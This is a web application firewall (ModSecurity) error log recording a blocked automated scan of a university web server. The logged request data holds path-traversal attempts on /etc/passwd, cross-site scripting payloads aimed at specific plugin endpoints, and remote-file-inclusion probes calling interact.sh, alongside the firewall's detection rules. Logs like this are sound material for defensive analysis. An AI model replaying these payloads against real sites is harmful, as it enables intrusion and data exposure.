[Tue Aug 29 11:52:49.547900 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:f. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:f: ../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/learn/cubemail/filemanagement.php"] [unique_id "ZO15ocCo-f0AAAnd3M0AAAAI"]
[Tue Aug 29 11:52:49.602295 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:u. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:u: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/tweb/ft.php"] [unique_id "ZO15ocCo-f0AAAoW7JIAAAAJ"]
[Tue Aug 29 11:52:49.643143 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/user/register"] [unique_id "ZO15ocCo-f0AAAoT7RAAAAAD"]
[Tue Aug 29 11:52:49.671665 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:m. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:m: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/anti-plagiarism/js.php"] [unique_id "ZO15ocCo-f0AAAmQ-3oAAAAb"]
[Tue Aug 29 11:52:51.379086 2023] [:error] [pid 2581] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/user/resend-activation"] [unique_id "ZO15o8Co-f0AAAoVqqAAAAAH"]
[Tue Aug 29 11:52:51.920180 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 1'<script found within ARGS:id: 1'<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO15o8Co-f0AAAoLfMIAAAAG"]
[Tue Aug 29 11:52:52.547940 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mes. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >\\x22>< found within ARGS:mes: </script>\\x22><script>alert(123)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php"] [unique_id "ZO15pMCo-f0AAAnd3OEAAAAI"]
[Tue Aug 29 11:52:52.602851 2023] [:error] [pid 2581] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:loginMode. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:loginMode: alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "repositoryfeb.unla.ac.id"] [uri "/MicroStrategyLibrary/auth/ui/loginPage"] [unique_id "ZO15pMCo-f0AAAoVqqUAAAAH"]
[Tue Aug 29 11:52:52.847592 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:redirect_to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://? found within ARGS:redirect_to: http://?1</sCripT><sCripT>alert(document.domain)</sCripT>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO15pMCo-f0AAAnTlXUAAAAA"]
[Tue Aug 29 11:52:55.916806 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:rsd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:rsd: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO15p8Co-f0AAAoW7LMAAAAJ"]
[Tue Aug 29 11:52:55.940742 2023] [:error] [pid 2581] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15p8Co-f0AAAoVqq4AAAAH"]
[Tue Aug 29 11:52:56.023213 2023] [:error] [pid 2581] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:")',10000000);alert(1337);setTimeout('alert(". [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22)',10000000);alert(1337);setTimeout('alert(\\x22: \\x22)',10000000);alert(1337);setTimeout('alert(\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/www/delivery/afr.php"] [unique_id "ZO15qMCo-f0AAAoVqq8AAAAH"]
[Tue Aug 29 11:52:58.593473 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:data[performredirect]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:data[performredirect]: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO15qsCo-f0AAAoPubAAAAAM"]
[Tue Aug 29 11:52:59.204749 2023] [:error] [pid 2594] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:file: '>\\x22<svg/onload=confirm('test')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/wordfence/lib/diffResult.php"] [unique_id "ZO15q8Co-f0AAAoiIjEAAAAa"]
[Tue Aug 29 11:53:00.669195 2023] [:error] [pid 2592] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22()&%< found within ARGS:language: language'\\x22()&%<yes></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/clansphere/mods/clansphere/lang_modvalidate.php"] [unique_id "ZO15rMCo-f0AAAog@BMAAAAY"]
[Tue Aug 29 11:53:00.694693 2023] [:error] [pid 2596] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:passformname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:passformname: \\x22><script>alert(1514407383);</script><script>/*"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/plugins/vkeyboard/vkeyboard.php"] [unique_id "ZO15rMCo-f0AAAoky18AAAAd"]
[Tue Aug 29 11:53:01.885278 2023] [:error] [pid 2590] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:pagination_wp_facethumb. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:pagination_wp_facethumb: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO15rcCo-f0AAAoesKIAAAAV"]
[Tue Aug 29 11:53:02.649025 2023] [:error] [pid 2600] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/awstats/awredir.pl"] [unique_id "ZO15rsCo-f0AAAoocvYAAAAh"]
[Tue Aug 29 11:53:02.814253 2023] [:error] [pid 2605] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:is2sim. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:is2sim: \\x22zlo onerror=alert(1) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/php/device_graph_page.php"] [unique_id "ZO15rsCo-f0AAAot8LMAAAAn"]
[Tue Aug 29 11:53:03.899040 2023] [:error] [pid 2604] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/cgi-bin/awstats/awredir.pl"] [unique_id "ZO15r8Co-f0AAAosCuwAAAAm"]
[Tue Aug 29 11:53:04.029114 2023] [:error] [pid 2606] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-json/anycomment/v1/auth/wordpress"] [unique_id "ZO15sMCo-f0AAAouCx8AAAAo"]
[Tue Aug 29 11:53:04.760601 2023] [:error] [pid 2585] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 0<script found within ARGS:version: 7.5.0<script>confirm(2Ue0IIxPe0GnIO9Ehzy5hFS4kkT)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/rewe/prod/web/rewe_go_check.php"] [unique_id "ZO15sMCo-f0AAAoZ6SIAAAAK"]
[Tue Aug 29 11:53:04.862896 2023] [:error] [pid 2605] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh?a=https://interact.sh found within TX:1: interact.sh?a=https://interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-json/anycomment/v1/auth/wordpress"] [unique_id "ZO15sMCo-f0AAAot8LkAAAAn"]
[Tue Aug 29 11:53:06.663060 2023] [:error] [pid 2605] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15ssCo-f0AAAot8L0AAAAn"]
[Tue Aug 29 11:53:08.365318 2023] [:error] [pid 2603] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:profile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:profile: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/magmi/web/magmi.php"] [unique_id "ZO15tMCo-f0AAAor7o4AAAAk"]
[Tue Aug 29 11:53:08.366348 2023] [:error] [pid 2585] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:q: \\x22><img src=x onerror=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/data/autosuggest-remote.php"] [unique_id "ZO15tMCo-f0AAAoZ6SgAAAAK"]
[Tue Aug 29 11:53:08.783322 2023] [:error] [pid 2604] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:p. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22; found within ARGS:p: \\x22;alert(document.domain);\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15tMCo-f0AAAosCvUAAAAm"]
[Tue Aug 29 11:53:08.802661 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:q: \\x22><img src=x onerror=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/admin/data/autosuggest-remote.php"] [unique_id "ZO15tMCo-f0AAAn403EAAAAW"]
